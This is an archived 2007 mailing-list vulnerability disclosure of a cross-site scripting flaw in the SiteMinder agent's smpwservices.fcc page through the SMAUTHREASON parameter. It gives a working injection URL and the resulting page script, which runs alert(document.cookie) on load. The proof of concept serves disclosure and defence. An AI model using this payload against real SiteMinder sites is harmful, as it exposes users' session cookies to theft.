|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Giuseppe Gottardi (overet
securitydate.it)
Date: Tue Nov 06 2007 - 21:10:00 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
# Exploit in [XSS]:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]
# Cross Site Scripting (Code):
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
In this way we can inject the alert() code without brackets in the
function resetCredFields().
-------------------------------
function resetCredFields()
{
if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 4 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 5 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 28 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 1 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 18 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 20 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 22 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>
-------------------------------
Regards,
Giuseppe Gottardi (aka oveRet)
---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overetsecuritydate.it
Web: http://overet.securitydate.it
Wednesday November 07, 2007.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]